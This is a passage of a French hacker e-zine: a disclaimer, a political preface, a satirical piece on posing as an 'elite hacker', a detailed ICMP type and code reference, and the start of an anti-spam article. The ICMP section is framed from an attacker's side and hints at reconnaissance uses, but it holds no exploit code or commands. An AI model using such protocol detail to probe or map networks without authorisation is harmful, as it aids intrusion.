-------------------------------------------------------------------------------------------- C . H . G . Cyber Hacker's Guide II -------------------------------------------------------------------------------------------- Disclaimer : Attention :Le contenu de ce mag peut heurter la sensibilité de certaines personnes.Veuillez attentivement lire ce qui suit, si vous souhaitez continuer la lecture de ce document. Tout ce qui est contenu dans ce mag n'est présent qu'à titre indicatif. Nous vous rappelons qu'accéder, de façon consciente ou non à un ou des systèmes, ou excéder les droits d'accès alloués, et par ce comportement, obtenir n'importe quel type d'information est illégal. Causer l'interruption d'un programme, d'informations, de code, de commandes sur un système sans autorisation est illégal. Cyber-Hack ainsi que les autres auteurs de ce mag n'assume absolument aucunes responsabilités des conséquences que pourrait avoir sur vous ou votre environnement tout ce qui est présent dans ce zine. Cyber-Hack et tout ce qui s'y rattache ne peut être tenu comme responsable d'une mauvaise utilisation de ce qui est présenté ici. Attention, toutes les informations sont fournies "tel quel", la précision ou la justesse des informations présentes dans ce mag sont sujettes à des conjectures. Aucune garantie implicite, ou non implicite, et d'aucun type que ce soit n'est assurée par Cyber-Hack ou par tous ceux qui s'y rattachent de près ou de loin. Vous utilisez les informations qui sont fournies dans ce mag à vos propres risques! Cependant nous nous engageons à essayer de fournir le moins d'informations erronées qu'il nous est possible. Si vous utilisez des sources ou des textes présentés ici, nous vous demandons que leur origine soit citée. Tous les personnages mentionnés dans cet e-zine sont purement et simplement fictifs. Toutes ressemblances avec des personnes, vivantes ou décédées, est purement accidentelle et n'est le fruit que de la coïncidence. Finalement :la lecture de ce document est réservé aux seuls membres de l'underground informatique qui agréant aux points précédents ne font pas partie des catégories suivantes : employé d'un état, d'une institution et/ou agence gouvernementale, de la police, de l'armée, de la SEFTI, de la DST, de la DGSE, de la GRC ou de toute organisation affiliée de près ou de loin aux précédentes ainsi qu'à toutes personne ayant un rapport direct ou indirect avec un quelconque service similaire. L'accès a ce texte par ces mêmes personnes ou institutions constituent donc une violation du copyright car cela revient à lire des informations propriétaires ! (c) constituant ainsi une atteinte à la vie privée.. A bon entendeur.... L'équipe de Cyber-Hack. Préface : Et oui voilà que sort le numéro 2 du Cyber Hacker's Guide... Dans l'ensemble le mag a été bien accueuilli; bien mieux que ce que j'avais espéré, alors nous allons continuer. Vous avez probablement tous lu : Altern.org condamné à payer plus de 400000 francs à cause d' une pouf à poil... Ca s'est un peu arrangé mais bon....ca me dégoute, Serge Humpich volé et muselé par GIE... tandis que les services affiliés à la répression du crime informatique se multiplient et se complaisent dans leur ignorance de l'underground... Si j'ai eu un jour une once d'espoir dans les pouvoirs politiques, ce devait être dans une autre vie. Ne vous leurrez pas, tous ces gars là sont pourris avec tous ceux qui les entourent !! Alors moi je n'ai qu'une chose à dire : c'est que nous devons leur montrer que nous ne sommes pas des boeufs à la raison étriquée qu'on mène par le bout du nez. On sait penser par nous même et raisonner, une faculté qui est aujourd'hui un véritable trésor ! Sachez le conserver et vous en servir ! Même si en ce moment les sites underground, les teams et les zines fleurissent, c'est aussi le cas de ceux qui cherchent à nous dénigrer ou à nous tourner à la dérision... Un exemple ? allez,en plus je lui fais de la pub : http://www.chez.com/zipiz. Alors comme vous pouvez très bien l'imaginer nous sommes toujours à la recherche d'auteurs pour écrire dans ce zine. Bon je crois que j'ai bien assez parlé ;) alors.... Bonne lecture! #Brain Override# -------------------------------------------------------------------------------------------- TABLE DES MATIERES -------------------------------------------------------------------------------------------- I] Comment devenir un élite hacker sans connaître une goutte d'informatique !!! #Illegal# II] Les services ICMP #Brain.Override# III] Quelques trucs de hackers pour un monde meilleur !!! #Illegal# IV] Les failles made in 3COM #Brain.Override# V] Liste des ports par défaut utilisés par les trojans #Brain.Override# VI] Liste de quelques sites intéressants #Brain.Override# VII] Conseal Pc firewall... #Brain.Override# VIII] ZIPIZ #Brain.Override# IX] Un décodeur de tonalité #Brain.Override# X] Qu'est-ce qu'un Hacker ? #Brain.Override# -------------------------------------------------------------------------------------------- I] COMMENT DEVENIR UN ELITE HACKER SANS CONNAITRE UNE GOUTTE D'INFORMATIQUE !!! Le but de cet article est de permettre a un plus grand nombre, parmis vous, de rentrer dans ce monde fermé des hackers. Quelques restrictions: être agé de 15 voir 16 ans, c'est un maximum. A partir de 25 ans, tout hacker se considère déjà lui même comme un grand gouroux élite hacker a donf. Par contre, avoir 15 ans et dire ouvertement: "Je suis le plus jeune Elite Hacker", ca c' estle must. 2ème restriction en fonction du pays: Pour un hacker Francais: Avoir de grosses lunettes, être boutonneux, boire du coca, fumer comme un pompier et avoir les cheveux gras. Pour un hacker Ricains: Là, on doit obligatoirement avoir un look CoWbOyzzz. Lunettes noires de rocker, blouson perfecto, cheveux long, boire de la BUD, porter des rangers et surtout terminer toutes ses phrases par "Fuck". Premierement: Le choix du pseudo. Evites absolument les pseudos type: ZIZIPANPAN, GOLDORAK, TINTIN, car n'oublies pas que dans le monde des hackers tu sera jugé non pas sur tes compétences, mais surtout sur ce que tu représentes, choisi plutôt un pseudo comme: BRAIN OVERRIDE, ARCHANGEL, EL CONDOR, DOMINIX, TOTAL ANNIHILITION, DOOM, ILLEGAL Là, déjà, rien qu'avec un pseudo comme ça, tu fais peur. Bon, ensuite, il va falloir rentrer dans le monde hacker, une seul solution, passer à l'attaque. Personnellement, je préconiserais la technique dite du "lonely Hacker" dite également technique du "hacker solitaire". Se pointer, en pleine heure de pointe dans un magazin type SURCOUF ou FNAC, choisir absoluement un magazin informatique, j'ai essayé au rayon boucherie CASINO, cela na rien donné du tout. Donc, se pointer dans un magazin type SURCOUF, au rayon soft, là où il y a plein de monde, et dire haut et fort au vendeur: "EXCUSEZ MOI, JE SUIS A LA RECHERCHE D'UN EDITEUR HEXADECIMAL TYPE HEX EDIT AINSI QUE DE MICROSOFT ASSEMBLEUR et SOFTICE", automatiquement un mec devrait te taper sur l'épaule et te dire: "EXCUSE MOI MEC, MAIS TU TROUVERAS PAS CA ICI, JE TE DONNE RENDEZ-VOUS DEMAIN A LA MEME HEURE, A TEL ENDROIT". Là, c'est le must, la rencontre dite "rencontre du troisieme type" non seulement tu vas connaître un vrai pirate mais en plus tu vas pouvoir rentrer dans le milieu. En language hacker, on parle alors de SCENE. Mais attention, lors de la rencontre, ne rien dire de trop technique au cas ou!!! Si tu tombes sur un vrai EliTe HaCkEr, tu aurais tout faux. Apres a toi de jouer! Deuxième technique, dite "cyber technique" dite "technique alt.2600": S'abonner au groupe de news "alt.2600" un news group de "Hackers" où il y a de tout sauf de vrais HaCkErs, et écouter les conversations. A un moment donné, automatiquement, on va voir une discussion s'enflamer avec plein de réponses type "FUCK OFF". Suivre surtout un pseudo, ARCHANGEL c'est un mec qui aurait écrit "CIA HACKERS" mais personne ne l'a lu. Personnellement, je suis devenu un Elite hackers et prouvant aux autres que ARCHANGEL était un charlot. Donc,a ce moment là, rentrer dans la conversation et s'imposer en médiateur, et balancer un truc du genre: "Calmez vous les gars!!! On a tous un point commun, le hacking, et la soif de connaissance, alors, faites la paix, c'est exactement ce que le gouvernement voudrait, que l'on se dispute. Unissons nous et nous serons plus fort" Terminer sont message par un petit mot du type: "Si parmis vous, il y a quelques jeunes qui aimeraient connaître et avoir des renseignements sur differentes techniques, qu'ils s'adressent a moi... Vous les jeunes êtes notre avenir !!!" Là, automatiquement, tu dois recevoir plein de "mail" du genre: "greeting, you're really an elite and cool hacker, you've got all my respect" en traduisant ca donne: "Félicitations, vous etes vraiment un hacker d'exception, vous avez tout mon respect" et voila, BINGO, vous êtes un Vrai EliTe HaCkEr !!! Bon, va surement aussi arriver le moment de la confrontation type dite "DEF COn Porte d'Italie"... Pas de pannique, souvent, il y aura toujours plus de mecs comme toi que de vrais hacker. Le vrai Hacker étant trop occupé pour participer à de telles reunions. Une seule solution, impressionner son monde, acheter un "t shirt" type 2600 le fameux journal de hackers que personne n'a lu, mais que tout le monde connait. Inscrire son pseudo dans le dos, avec "FREE KEVIN' dessus, et en route pour la réunion de hackers, succès garanti. Voila, mon prochain article traitera de la technique dite "CHATTING IRC" et LINUX. Bonne continuation, et n'hésitez pas à me transmettre vos avancées personnelles dans le monde des hackers. #!LLEGAL# du groupe L.O.L. (Legion Of Linux) -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- II] Les services ICMP Vous savez probablement tous ce qu'est plus ou moins ICMP. Avant donc de parler des services proprement dit, un petit rappel sur ce qu'est ICMP. Le protocole IP offre un service de remise de datagramme sans connection, cependant il ne tente pas d'assurer une remise fiable de ces mêmes datagrammes. C'est aux protocoles de couches supérieures tels que TCP, qu'incombe cette tâche. Il existe cependant un moyen pour le protocole IP, d'envoyer des messages d'alerte et de diagnostic par l'intermédiaire d'un module. Ce module c'est bien entendu ICMP (Internet Control Message Protocole ou encore : Protocole de message de contrôle Internet). Ces messages ont pour but de permettre de détecter des problèmes potentiels ou réels. En effet, le protocole IP ayant été conçu dans un souci de simplicité, des erreurs surviennent souvent, lors de la transmission d'un datagramme. Ces erreurs sont généralement détectées au niveau d'un routeur intermédiaire comme par exemple si le réseau de destination est de type local à diffusion tel qu'un Ethernet, le routeur s'apperçoit que l'hôte n'est pas disponible au moment où il utilise l'ARP pour trouver l'adresse matérielle de l'hôte de destination à partir de son adresse IP. Quand ce cas se présente, le routeur tente d'en informer l'emetteur en envoyant un message ICMP qui indique que l'hôte de destination n'est pas disponible. Il existe bien sur d'autres types de problèmes comme l'expiration du champ TTL, l'indisponibilité d'un protocole etc.. ICMP est plus simplement, le protocole particulier qui utilisé conjointement à IP permet d' alerter le réseau sur l'existence d'erreurs, de tester le réseau et d'obtenir des infos le concernant. Bon pour résumer disons que : Toutes les implémentations IP doivent implémenter le ICMP ICMP est un client de IP (il s'exécute au dessus) bien qu'il soit implémenter dans IP. ICMP bien que signalant les condition d'erreur ne rend pas le protocole IP plus fiable. ICMP ne signale les erreurs que pour le premier fragment d'un datagramme. ICMP ne génère aucun message d'erreur concenant les problèmes affectant des datagrammes ICMP. ICMP ne doit pas signaler les problèmes suivants : Broadcast ou multicast. Routage ou remise des messages ICMP. Diffusion ou multidiffusion au niveau de la couche de liaison de données. Si vous voulez plus d'infos : RFC 792,950,1812,1122,1256 et 1191. Bon maintenant passons aux services proprement dit. Je suis sur que les petis lamers qui cliquent sur "attaque packet ICMP Destination unreachable" dans leur super 3l33t WareZ WarlordZ programmes n'en soupçonnent même pas le fonctionnement... ----------------- | Services ICMP | ----------------- | | --------------------------------------------------------------------------- | | | | | | | | -------- | ----------------- | ---------------------------- | --------------- | | Echo | | | Time exceeded | | | Parameter unintelligible | | | Adress mask | | -------- | ----------------- | ---------------------------- | --------------- | | | | | | | | | ------------- --------------------------- ------------ ----------------- | Timestamp | | Destination Unreachable | | Redirect | | Source quench | ------------- --------------------------- ------------ ----------------- Comme vous pouvez le constater, ICMP fournit une gamme assez large de services de messages d'erreur, d'information et de diagnostic. Les principaux services sont listés si dessus. Voyons un peu leur utilité : Echo : Ce service est utilisé comme un outil de diagnostic et sert à déterminer si un noeud IP est accessible. Timestamp : C'est en quelque sorte un "marqueur de temps", en fait il est utilisé pour la mesure du temps sur un inter-réseau. Time exceeded : C'est le temps écoulé. Ce service est utilisé pour indiquer l'expiration de la valeur du champs TTL de l'en-tête de l'IP. Destination unreachable : Qu'on peut traduire par destination inaccessible est un service qui indique simplement qu'un noeud IP n'est pas accessible. Parameter unintelligible ou encore parameter problem : Indique un problème dans un datagramme IP Redirect : C'est un service utilisé par les routeurs pour indiquer une route de substitution Adress mask : Il s'agit du masque d'adresse, c'est à dire que ce service permet d'obtenir des informations de masque de sous-réseau pour le réseau. Source quench : Ce service sert simplement à indiquer un problème de congestion à la source. Quel que soit le message ICMP le format général reste à peu de choses près le même. Le premier octet de l'en-tête ICMP est le champ Type, indiquant le type du service ICMP. L' octet suivant contient une valeur code décrivant plus en détail la nature du type de message. Il faut donc considérer les valeurs des champs type ET code pour déterminer la valeur exacte du message ICMP. Un petit schéma qui montre la structure générale des messages IP. Octets |--------------------------------------------------------------------------------------- | | 1 | 1 | 2 | 4 | | ICMP | IP | |--------------------------------------------------------------------------------------- | En-tête IP | Type | Code | Total de contrôle | Paramètre | Informations | Data link | |--------------------------------------------------------------------------------------- | | | | | --------------------------------- | | En-tête IP en échec + 64 bits | | | de données ULP | | --------------------------------- | | | | ----------------------------------------- | Type | ICMP Message | ----------------------------------------- | 0 | Echo reply | | 3 | Destination unreachable | | 4 | Source quench | | 5 | Redirect | | 8 | Echo request | | 11 | Time exceeded | | 12 | Parameter (IP) unintelligible | | 13 | Timestamp request | | 14 | Timestamp reply | | 15 | Information request | | 16 | Information reply | | 17 | Adress mask request | | 18 | Adress mask reply | ----------------------------------------- Bon comme en plus je suis gentil je vais vous donner la liste des valeurs de type pour ICMP --------------------------------------------------------- | Valeur de type | Signification | --------------------------------------------------------- | 0 | Echo reply | | 1 | Unassigned | | 2 | Unassigned | | 3 | Destination Unreachable | | 4 | Source Quench | | 5 | Redirect | | 6 | Alternate Host Address | | 7 | Unassigned | | 8 | Echo | | 9 | Router Advertisement | | 10 | Router Selection | | 11 | Time Exceeded | | 12 | Parameter Problem | | 13 | Timestamp | | 14 | Timestamp Replay | | 15 | Information Request | | 16 | Information Reply | | 17 | Address Mask Request | | 18 | Address Mask Reply | | 19 | Reserved (for security) | | 20-29 | Reserved (for Robustness Experiment) | | 30 | Traceroute | | 31 | Datagram Conversion Error | | 32 | Mobile Host Redirec | | 33 | IPv6 Where-Are-You | | 34 | IPv6 I-AM-Here | | 35 | Mobile Registration Request | | 36 | Mobile Registration Reply | | 37-255 | Reserved | --------------------------------------------------------- Les types ICMP 0 et 8 : Echo/PING Les messages ICMP les plus utilisés sont sans doute les types Echo 0 et 8. Il s'agit des messages utilisés pour le diagnostic par l'utilitaire PING (Packet Internet Groper). PING permet en effet de vérifier qu'un noeud est "vivant" et accessible. Ping fonctionne de la manière suivante : Il envoie un message ICMP de type Requête d'écho (8) à un noeud IP. A la réception du message, le noeud IP renvoie un message ICMP de réponse d'écho (0). Le message de réponse d'écho contient une copie des données envoyées dans le message de requête d'écho. La réception d'un message de réponse d'echo confirme que la couche IP et les couches inférieures du système de transport fonctionnent bien entre la source et la destination. Si des routeurs intermédiaires sont rencontrés entre la source et la destination, le message de réponse d'écho indique aussi que les routeurs sont en mesure de transmettre des datagrammes entre la source et la destination. Le noeud IP est généralement un hôte ou un routeur. L'utilitaire PING est utilisé pour générer le message de requête d'écho ICMP. Le module IP qui s'éxécute sur le noeud de destination répond automatiquement aux messages ICMP de requête d'écho générés par PING. Je ne m'étendrai pas d'avantage sur les différentes options et fonctionnalités de PING sur les divers type d'OS. Type ICMP3 : Destination inaccessible. La non remise d'un datagramme est généralement détectée par les routeurs, le plus souvent, c'est le dernier routeur de la chaîne des routeurs du chemin emprunté par le datagramme. Quand un routeur se trouve dans l'incapacité de remettre un datagramme, il en avertit l' emetteur par le biais d'un message ICMP de destination inaccessible. Les protocoles de couche supérieure, tels que TCP, transmettent le message perdu sans connaître la cause de l'échec de la remise. Le message ICMP permet dans certains cas d'indiquer à l'emetteur cette cause. Codes pour le message Destination inaccessible --------------------------------------------------------------------------------- | Code | Signification | --------------------------------------------------------------------------------- | 0 | Net Unreachable | | 1 | Host Unreachable | | 2 | Protocol Unreachable | | 3 | Port Unreachable | | 4 | Fragmentation Nedded and Don't Fragment was Set | | 5 | Source Route Failed | | 6 | Destination Network Unknow | | 7 | Destination Host Unknow | | 8 | Source Host Isolated | | 9 | Communication with Destination Network is Administratively Prohibited | | 10 | Communication with Destination Host is Administratively Prohibited | | 11 | Destination Network Unreachable for Type of Service | | 12 | Destination Host Unreachable for Type of Service | | 13 | Communication Administratively prohibited because of firewalls | | 14 | Host Precedence Violation | | 15 | Precedence cut-off in effect | --------------------------------------------------------------------------------- Code 0 : Réseau inaccessible Cette valeur est générée lorsque le réseau spécifié dans l'adresse IP de destination est introuvable. Seuls les routeurs peuvent générer ce message. La cause peut être l'erreur dans l'IP de destination ou dans la table de routage du routeur générant le message ICMP. L'adresse source contenue dans l'en-tête IP transportant ce message identifie le routeur ayant généré l'erreur. Code 1 : Hôte inaccessible Cette valeur est générée par le routeur qui est directement connecté au réseau de destination. Elle indique que le datagramme a été remis avec succès par les routeurs mais que le dernier routeur se trouve dans l'incapacité de communiquer avec l'hôte. Les causes peuvent être multiples : routeur qui ne parvient pas à déterminer l'adresse matérielle de destination à l'aide du protocole ARP, hôte hors service, mal configuré ou IP spécifiée incorrecte. C'est l'adresse source contenue dans l'en-tête IP qui transporte le message ICMP qui identifie le routeur qui à généré l'erreur. Ce type de message d'erreur (code 1) implique un échec dans la remise tandis que les messages d'erreur de type code 0 impliquent un échec lors du routage. Code 2 : Protocole inaccessible Ce code est généré pas lhôte de destination. Il indique que le datagramme a bien atteint l'hôte de destination mais que le protocole de couche supérieure, transporté par le datagramme IP et identifié par le champs protocole de l'en-tête IP, n'est pas disponible. Les protocoles de couche supérieure les plus courant sur les hôtes TCP/IP sont TCP, UDP et OSPF. La majorité des hôtes TCP/IP prennent au moins en charge TCP et UDP. Un message ICMP qui indique qu'un tel protocole est inaccessible est signe d'un grave problème de configuration au niveau de l'hôte. Dans la majorité des cas, les systèmes TCP/ip mettent en place des données spécifiques pour la configuration. Par ex sous UNIX le fichier /etc/protocols. Code 3 : Port inaccessible Ce code est généré lorsque le protocole de couche de transport indiqué est incapable de démultiplexer le datagramme et ne dispose pas d'autre moyen pour en informer l'emetteur. La cause peut être par ex l'absence d'un service d'application spécifique au niveau de l'hote de destination. Les services d'application sont identifiés par des numéros de port TCP ou UDP. Sur la pluspart des systèmes, ces services sont lancés après lecture de fichiers de configuration dédiés, (ex sous Unix : /etc/inetd.conf) lors de l'initialisation du système TCP/IP. A notre aussi que de nombreux systèmes emploient le concept de processus de serveur,appelé le superdemon inetd, qui écoute les requêtes arrivant sur les numéros de port de service d'application. Il arrive lorque le processus de serveur n'est pas activé que les services d'application soient indisponibles. Code 4 : Fragmentation nécessaire et flag Ne pas fragmenter est activé Ce code est généré par les routeurs qui doivent fragmenter le datagramme parce que la taille de MTU de l'interface de réseau par laquelle doit trasiter le datagramme est inférieure à celle du datagramme. Si dans l'en-tête IP du datagramme, le flag (DF) est mis à 1, le routeur ne peut transmettre le datagramme et doit donc l'écarter. Il envoie alors à l' emetteur initial un message ICMP de type 3 signalant que le datagramme n'a pu être envoyé, le code 4 en indiquant la raison. Code 5 : Echec du source route Ce code est (encore) généré par un routeur. Il est généré seulement pour les datagrammes IP utilisant l'option IP Source Route. Si un routeur se trouve dans l'incapacité de transmettre le datagramme en respectant le chemin de source route, il doit écarter le datagramme, puis envoyer à l'émetteur un message ICMP type 3 code 5, indiquant que la source route a échoué. L'identité du routeur qui a généré ce message peut être trouvé en examinant le champ d'adresse source de l'en-tête IP du message ICMP. Le message ICMP Echec source route doit contenir une option source route de même type (strict ou loose), créée en prenant dns l'option de source route du datagramme initial la portion du champ d'option située avant le pointeur de route enregistrée, et en l'inversant. Le seul cas où les champs de source route du datagramme fautif ne sont pas utilisés se rencontre lorsqu'un message ICMP Problème de paramètre concernant une source route est envoyé, ou lorsque le routeur a connaissance de règlements qui empêcheraient la remise du message ICMP utilisant les informations de source route du datagramme initial. Code 6 : Réseau de destination inconnu Ce message n'est jamais généré sur un réseau réel, car le routeur préfèrer génerer un message de type 3 code 0, ce code est obsolète. En théorie, il était supposé être généré par un routeur lorsque celui-ci aurait détecté, en consultant sa table de routage un réseau de destination inconnu Code 7 : Hôte de destination inconnu Ce code est généré par un routeur lorsque celui-ci peut détecter, par le biais du logiciel de couche de liaison situé au niveau de son interface de réseau, que l'hôte de destination n'existe pas. Le protocole de couche de liaison de données pour les liaisons point to point peut détecter l'existence de périphériques à chacunes des extrémités de la liaison. Si un routeur est connecté à l'hôte de destination via un réseau local à diffusion tel qu' Ethernet, le routeur ne peut déterminer que l'hôte n'existe pas. Dans le cas d'un réseau local, le routeur envoie une requête ARP pour déterminer l'adresse matérielle, et s'il ne reçoit pas de réponse, il suppose que l'hôte de destinatino est inaccessible. Les routeurs doivent utilisér de messages code 1 ou code 7 lorque d'autres hôttes du même réseau de destination sont accessibles, sinon l'emetteur pourrait conclure à tort que tous les hôtes du réseau sont inaccessibles. Code 8 : Hôte source isolé STD3, qui est décrit par le RFC 1122, définit un message de code 8. Ce message est généré lorsqu'un routeur peut détecter que l'hôte source est isolé du reste du réseau. Toutefois, le RFC 1812 déclare que les routeurs ne doivent pas générer de messages de code 8 mais doivent utiliser plutôt un code 0 ou code 1, selon la circonstance. Les codes 8 sont donc obsolètes. Codes 9 et 10 : communication avec le réseau/hôte de destination inter. par l'administrateur Un code 9 indique que la communication avec le réseau de destination est interdite administrativement tandis que le code 10 indique que c'est la communication avec l'hôte de destination qui est interdite. Les codes 9 et 10 furent conçus pour être utilisés par des périphériques de chiffrement point à point des agences militaires américaines. Le RFC 18112 déclare que les routeurs doivent utiliser le code 13 nouvellement défini (communication interdite par l' administrateur) dans le cas d'un filtrage adminstratif des paquets. Codes 11 et 12 : Réseau/Hôte de destination inaccessible pour le type de service Ces messages sont générés si un routeur est incapable de transmettre le datagramme à un réseau ou à un hôte de destination parce que les routes de sa table de routage ne peuvent trouver le type de service (TOS) demandé, ou la valeur de TOS par défaut. La valeur de TOS est spécifiée dans l'en-tête IP du datagramme et permet de spécifier la présénce, le retard , le débit et le coût du chemin suivi par le datagramme. Un code 11 indique que le réseau de destination est inaccessible pour le TOS spécifié, un code 12 insique que c'est l'hôte de destination qui est inaccessible. Code 13 : Communication interdite par l'administrateur du fait d'un coupe-feu La pluspart des routeurs récents disposent d'un logiciel de filtrage des paquets permettant de mettre en place des règles de filtrage interdisant la transmission de paquets au vu de l'adresse IP, du type de protocole, des numéros de port spécifiés, etc. Ce filtrage est une mesure de sécurité et constitue la première ligne de défense contre des intrusions hostiles. L'implémentation d'un routeur peut envoyer des messages ICMP indiquant que le datagramme n'a pu être transmis pour des raisons administratives. Malheureusement pour nous (mais beaucoup ne le font pas), le routeur peut être configuré pour ne pas envoyer de tels messages. Dans ce cas aucun message d'erreur ICMP ne sera renvoyé pour chaque paquet refusé administrativement. De cette manière, le routeur ne risque pas de donner des informations supplémentaires à l'émetteur des paquets suspects. Code 14 : Violation de préseance d'hôte Ce message est généré par le routeur de premier pas c'est à dire le premier routeur que le datagramme doit franchir pour atteindre sa destination. Ce message ICMP est généré pour indiquer que la préséance demandée n'est pas permise pour l'adresse source-destination spécifiée, pour le protocole de couche supérieure ou pour les numéros de port source-destination Le routeur peut également être configuré de manière à ne pas renoyer de message de code 14. Code 15 : Precedence cut-off in effect Ce code est également généré par un routeur. Un administrateur peut spécifier un niveau de préséance minimale, requis pour une route spécifique de la table de routage. Si le datagramme a été envoyé avec une préséance inférieure, il ne peut être transmis par cette route. Si le datagramme doit être écarté, un message ICMP type 3 code 15 est envoyé à l' émetteur. Le routeur peut être dans ce cas aussi configuré pour ne pas générer de code 15. Le type ICMP 4 : source Quench. Le réseau IP est sans connexion. Les routeurs d'un réseau IP transmettent les datagrammes IP unité par unité et ne réservent pas de mémoire pour les datagrammes d'une session particulière. Le concept même de session est étranger au processus de routage. Il est donc possible que des routeurs connaissent une congestion temporaire, c'est à dire un état dans lequel il n'y a plus assez de mémoire ou de place dans le tampon pour que le routeur puisse stocker les datagrammes entrants. Lorsqu'une congestion survient, plusieurs routeurs du réseau peuvent être affectés. Les datagrammes entrants peuvent ne pas être traités immédiatemment parce que le routeur est occupé à traiter d'autres datagrammes. Les tampons sont utilisés par les routeurs pour stocker temporairement les datagrammes avant traitement et transmission. Les routeurs connectés à des liaisons lentes sont osuvent la proie de congestion, mais ce peut être également le cas de routeurs disposant de peu de mémoire ou de puissance de calcul limitée. Lorsqu'un routeur subit une congestion et que ses tampons sont pleins, il doit écarter les datagrammes entrants. Le routeur génère alors des messages ICMP Source Quench pour demander aux émetteurs de ralentir la fréquence de leurs envois. Le message Source Quench est un mécanisme assez rudimentaire de régulation de flux, destiné à éviter que les routeurs ne soient submergés par les datagrammes entrants. Il n'existe pour l'instant aucun message ICMP permettant d'annuler ou d'inverser le message Source Quench pour indiquer que la congestion a cessé. Les problèmes de contrôle de flux sont mieux traités par les protocoles de couche de transport tels que TCP, responsables de la remise fiable des données. Voir pour plus d'infos les RFC 1122 1106 et 1812 Le type ICMP 5 : Redirection Ce type de message est envoyé par un routeur chaque fois que celui-ci détecte qu'un autre routeur propose un chemin optimal pour le datagramme. Les routeurs échangent des informations de routage sur le réseau à l'aide d'un protocole de routage. A chaque instant, les routeurs disposent d'informations optimales ou presque, concernant les routes possibles dans le réseau. Quant aux hôtes, ils ne disposent que d'informations de routage minimales. Un hôte ne connaît généralement que quelques réseaux et le routeur de prochain pas permettant d'accéder à chacun de ces réseaux. Les routeurs de prochain pas sont les routeurs situés à un pas (hop) de la source. Autrement dit, l'hôte source et ses routeurs de prochain pas sont connectés directement. De plus les hôtes disposent généralement d'un routeur par défaut, utilisé pour transmettre les datagrammes vers toutes les destinations qui ne figurent pas explicitement dans la table de routage de l'hôte. L'initialisation de la table de routage d'un hôte se fait généralement au démarrage du système. Les informations de cette table figurent dans la zone de données de configuration de l'hôte, la pluspart du temps sous forme de fichiers. Si la topologie du réseau change, les routeurs prennent connaissance des nouvelles routes permettant d'atteindre les différentes destinations, car les protocoles de routage qu'ils utilisent leur permettent d'échanger des informations sur la topologie et conservent des tables de routage qui ne sont plus optimales. A la réception d'un message ICMP Redirection, les hôtes doivent mettre à jour leur table de routage en tenant compte des nouvelles informations concernant le nouveau routeur. Le prochain datagramme envoyé à la même destination devra utiliser la route optimale mentionnée dans le message Redirection. Toutefois certaines implémentaions d'hôte TCP/IP ignorent purement et simplement les messages ICMP de redirection chaque fois qu'un datagramme est envoyé au routeur non optimal. Le routeur qui génère le message ICMP de redirection transmet aussi le datagramme au routeur optimal. Comme cette transmission peut se faire sur le réseau qui a reçu le datagramme, le nombre de datagrammes transmis est doublé La présence de messages ICMP indique la possibilité que des routes ne soient pas optimales. Valeurs des codes pour le message ICMP de redirection ------------------------------------------------------------------------ | Code | Signification | ------------------------------------------------------------------------ | 0 | Rediriger le datagramme pour le réseau (ou sous réseau) | | 1 | Rediriger le datagramme pour l'hôte | | 2 | Rediriger le datagramme pour le Type de Service et le réseau | | 3 | Rediriger le datagramme pour le Type de Service et l'hôte | ------------------------------------------------------------------------ Les messages de code 0 et de code 2 s'appliquent à tous les hôtes du réseau spécifié. Le code 3 est généré lorsque le paquet qui a provoqué le message de redirection ICMP doit être envoyé par un chemin qui dépendrait, en partien du TOS demandé. Pour que les routeurs puissent générer ce type de message il faut impérativement uqe les conditions suivantes soient vérifiées : Le datagramme est transmis vers l'extérieur par l'interface physique utilisée pour sa réception. L'adresse IP source figurant dans les paquets est sur le même (sous) réseau IP que l' adresse IP de prochain pas. Le datagramme ne contient pas une option IP Source route. Pour finir récapitulons : ICMP est une composante obligatoire de IP qui permet d'envoyer des messages d'alerte et de diagnostic par le biais du module ICMP. Le module ICMP est implémenté au sein du module IP. Les messages ICMP sont donc très utiles pour la détection de problèmes réels ou potentiels sur un réseau. On peut générer des messages ICMP en réponse à des conditions d'erreur très variées. Les messages ICMP servent également à diagnostiquer un réseau et à établir des statistiques concernant celui-ci. J'espère que vous en comprendrez grâce à cette doc les autres utilisations que vous pouvez en faire.... #Brain Override# -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- III]QUELQUES TRUCS DE HACKERS POUR UN MONDE MEILLEUR !!! (ici, il ne sera traité que de technique pouvant apporter des connaissances à la compréhension de tout ce qui touche a l'Internet, en aucun cas, il ne sera question de techniques dangereuses voir illégales (NDRL: Bouhhhh!). Donc, pas la peine de me contacter pour ce genre d'info.). Un petite remarque en passant, je dis bien " à l'Internet " et non pas " à Internet ", l'Internet n'étant pas une marque (NDRL: Il fait toujours des siennes à ce sujet...). Le mot Hacker est souvent employé a tord en voulant parler d'un pirate, la traduction du mot Hacker peut se traduire par le mot " bidouilleur " ou par tout autre mot désignant quelqu'un de curieux, qui recherche le pourquoi du comment, qui expérimente diverses techniques. A ne pas confondre avec Pirates, qui est une personne qui s'introduit sur un système informatique , a l'insu par exemple de l'administrateur de la machine (NDRL: C'est vrai ça,pauvre Admin;) , dans le but de modifier des pages web, de " pomper " de l'information, de les revendre, etc etc... C'est une pratique tout a fait condamnable, et d'ailleurs souvent condamnée. Divers articles suivront celui-ci. (NDRL : On espère) " COMMENT LUTER CONTRE LES SPAMMERS " Qu'est ce que c'est que ca un spam???? Le mot Spam a pour origine une marque de conserve de type corned beef au contenu difficilement identifiable mais très populaire dans les pays Anglo-saxons. Ce mot est souvent assimilé à quelque chose d'omniprésent (dans tous les magasins alimentaires), de dénué de goût, insipide, ou sans substance. Les Monty-Pythons l'on rendu encore plus populaire grace a l'un de leur sketch. D'autres, disent que SPAM vient de la contraction de " Send by Post A lot of Mail " sans commentaire ... Mais quelle imagination !!! (N'est ce pas Archangel t'as du fumer la moquette pour trouver ca !!!) Un spam est un message envoyé a plusieurs destinataires en même temps, soit personnellement à une adresse email, soit dans un groupe de news. Ces messages ont toujours un rapport avec soit la religion (sectes), l'argent (comment gagner 10$ a la seconde) ou le sexe. Ces derniers temps, les spammers ont pris une très grande importance, avec en plus une loi Francaise qui leur est favorable, ce qui peut entrainer une surcharge des serveurs mail, de serveurs de news, de la bande passante, et des temps de connexion. Combien parmi vous, pour un mail intéressant, ne se sont pas retrouvés avec 10 mails en même temps vous vantant les mérites du produits DUCHMOL, ou bien comment gagner beaucoup d'argent dans une très brève période de temps ??? La cible privilégiée des SPAMMERS sont les comptes email du genre geocities.com ou USA.net etc etc ... A cela 2 raisons: Les emails "tants gratuites, tous le monde prends une " boite " de ce genre au cas ou, ou bien pour rester " faussement " anonyme. Il ne reste plus qu'au spammer à récupérer ces 